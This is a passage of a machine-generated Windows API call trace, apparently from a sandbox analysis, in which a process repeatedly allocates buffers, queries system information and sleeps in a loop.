(HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.005] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.005] Sleep (dwMilliseconds=0x110) [0299.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0299.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0299.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0299.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0299.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0299.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0299.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0299.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0299.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.017] Sleep (dwMilliseconds=0x110) [0299.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0299.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0299.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0299.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0299.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0299.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0299.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0299.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0299.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.032] Sleep (dwMilliseconds=0x110) [0299.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0299.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.045] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0299.045] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0299.045] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0299.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0299.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.046] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0299.046] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0299.046] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0299.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.047] Sleep (dwMilliseconds=0x110) [0299.065] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0299.065] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0299.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0299.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.066] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0299.066] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0299.066] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0299.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0299.067] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.067] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0299.067] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.068] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.068] Sleep (dwMilliseconds=0x110) [0299.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0299.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.075] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0299.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0299.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0299.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0299.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0299.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0299.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0299.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.081] Sleep (dwMilliseconds=0x110) [0299.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0299.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0299.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0299.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0299.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0299.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0299.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.097] Sleep (dwMilliseconds=0x110) [0299.112] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0299.112] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0299.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0299.113] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.113] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0299.113] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0299.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.114] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0299.114] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.114] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.115] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.115] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.115] Sleep (dwMilliseconds=0x110) [0299.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0299.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0299.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0299.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0299.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0299.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0299.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0299.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0299.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.130] Sleep (dwMilliseconds=0x110) [0299.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0299.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0299.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0299.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0299.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0299.145] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0299.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.146] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.146] Sleep (dwMilliseconds=0x110) [0299.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0299.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0299.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0299.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0299.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0299.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0299.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0299.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.160] Sleep (dwMilliseconds=0x110) [0299.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0299.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0299.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0299.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0299.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0299.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0299.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0299.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0299.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.177] Sleep (dwMilliseconds=0x110) [0299.189] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0299.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0299.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0299.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0299.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0299.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0299.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.193] Sleep (dwMilliseconds=0x110) [0299.200] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0299.200] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.201] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0299.201] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0299.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0299.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0299.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0299.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0299.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0299.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0299.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0299.206] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0299.206] Sleep (dwMilliseconds=0x110) [0299.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0299.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0299.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0299.220] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0299.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0299.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0299.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0299.221] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0299.221] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, 